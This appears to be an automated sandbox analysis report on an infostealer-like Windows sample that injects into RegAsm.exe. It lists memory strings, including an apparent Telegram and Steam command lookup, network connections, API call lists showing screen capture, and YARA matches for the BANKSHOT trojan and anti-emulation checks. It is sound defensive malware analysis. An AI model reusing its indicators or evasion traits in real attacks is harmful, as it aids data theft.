              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: IEHCAK.2.drString found in binary or memory: https://support.mozilla.org
              Source: IEHCAK.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: IEHCAK.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
              Source: file.exe, 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
              Source: RegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: HCFIJK.2.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: HCFIJK.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: IEHCAK.2.drString found in binary or memory: https://www.mozilla.org
              Source: IEHCAK.2.drString found in binary or memory: https://www.mozilla.org#
              Source: IEHCAK.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: IEHCAK.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: IEHCAK.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: RegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.6:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.6:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_004112FD

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
              Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
              Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
              Source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC9B8C0 rand_s,NtQueryVirtualMemory,2_2_6CC9B8C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC9B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6CC9B910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC9B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6CC9B700
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC3F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6CC3F280
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00146AF80_2_00146AF8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001435600_2_00143560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C07A2_2_0041C07A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E1902_2_0041E190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BB292_2_0041BB29
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CCA72_2_0041CCA7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC335A02_2_6CC335A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC76CF02_2_6CC76CF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC46C802_2_6CC46C80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCAAC002_2_6CCAAC00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC75C102_2_6CC75C10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC82C102_2_6CC82C10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC70DD02_2_6CC70DD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC4FD002_2_6CC4FD00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC5ED102_2_6CC5ED10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC3BEF02_2_6CC3BEF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC4FEF02_2_6CC4FEF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC55E902_2_6CC55E90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC94EA02_2_6CC94EA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC82E4E2_2_6CC82E4E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC59E502_2_6CC59E50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC73E502_2_6CC73E50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCA6E632_2_6CCA6E63
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC77E102_2_6CC77E10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC99E302_2_6CC99E30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC3DFE02_2_6CC3DFE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC66FF02_2_6CC66FF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC49F002_2_6CC49F00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC758E02_2_6CC758E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC588502_2_6CC58850
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC5D8502_2_6CC5D850
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC478102_2_6CC47810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC7B8202_2_6CC7B820
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC848202_2_6CC84820
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC929902_2_6CC92990
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC3C9A02_2_6CC3C9A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC6D9B02_2_6CC6D9B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC5A9402_2_6CC5A940
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC4D9602_2_6CC4D960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC8B9702_2_6CC8B970
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC78AC02_2_6CC78AC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC51AF02_2_6CC51AF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCABA902_2_6CCABA90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC64AA02_2_6CC64AA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC4CAB02_2_6CC4CAB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCA2AB02_2_6CCA2AB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC79A602_2_6CC79A60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC464C02_2_6CC464C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC5D4D02_2_6CC5D4D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC3D4E02_2_6CC3D4E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC934A02_2_6CC934A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC9C4A02_2_6CC9C4A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC454402_2_6CC45440
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCA545C2_2_6CCA545C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCA542B2_2_6CCA542B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC985F02_2_6CC985F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC605122_2_6CC60512
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCA76E32_2_6CCA76E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC9E6802_2_6CC9E680
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC546402_2_6CC54640
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC3C6702_2_6CC3C670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC856002_2_6CC85600
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC877A02_2_6CC877A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC777102_2_6CC77710
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCA50C72_2_6CCA50C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC5C0E02_2_6CC5C0E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC660A02_2_6CC660A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC7F0702_2_6CC7F070
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC751902_2_6CC75190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCAB1702_2_6CCAB170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC7E2F02_2_6CC7E2F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC322A02_2_6CC322A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCA53C82_2_6CCA53C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC3F3802_2_6CC3F380
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC353402_2_6CC35340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC4C3702_2_6CC4C370
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC7D3202_2_6CC7D320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD3ECD02_2_6CD3ECD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCDECC02_2_6CCDECC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCEAC602_2_6CCEAC60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDA6C002_2_6CDA6C00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDBAC302_2_6CDBAC30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CE6CDC02_2_6CE6CDC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD76D902_2_6CD76D90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCE4DB02_2_6CCE4DB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDAED702_2_6CDAED70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CE0AD502_2_6CE0AD50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CE68D202_2_6CE68D20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCEAEC02_2_6CCEAEC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD80EC02_2_6CD80EC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD66E902_2_6CD66E90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD7EE702_2_6CD7EE70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDC0E202_2_6CDC0E20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDBEFF02_2_6CDBEFF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCE0FE02_2_6CCE0FE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CE28FB02_2_6CE28FB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCEEFB02_2_6CCEEFB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD4EF402_2_6CD4EF40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDA2F702_2_6CDA2F70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CE20F202_2_6CE20F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CCE6F102_2_6CCE6F10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDE68E02_2_6CDE68E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDB48402_2_6CDB4840
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD308202_2_6CD30820
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD6A8202_2_6CD6A820
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD149F02_2_6CD149F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDFC9E02_2_6CDFC9E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDA09B02_2_6CDA09B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD709A02_2_6CD709A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD9A9A02_2_6CD9A9A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD189602_2_6CD18960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD369002_2_6CD36900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD5EA802_2_6CD5EA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD5CA702_2_6CD5CA70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD8EA002_2_6CD8EA00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD98A302_2_6CD98A30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CDE6BE02_2_6CDE6BE0
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 001351D0 appears 48 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CC794D0 appears 90 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CC6CBE8 appears 134 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024D7 appears 311 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CE609D0 appears 105 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004180A8 appears 104 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
              Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
              Source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/26@1/2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC97030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6CC97030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,2_2_004106C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199689717899[1].htmJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
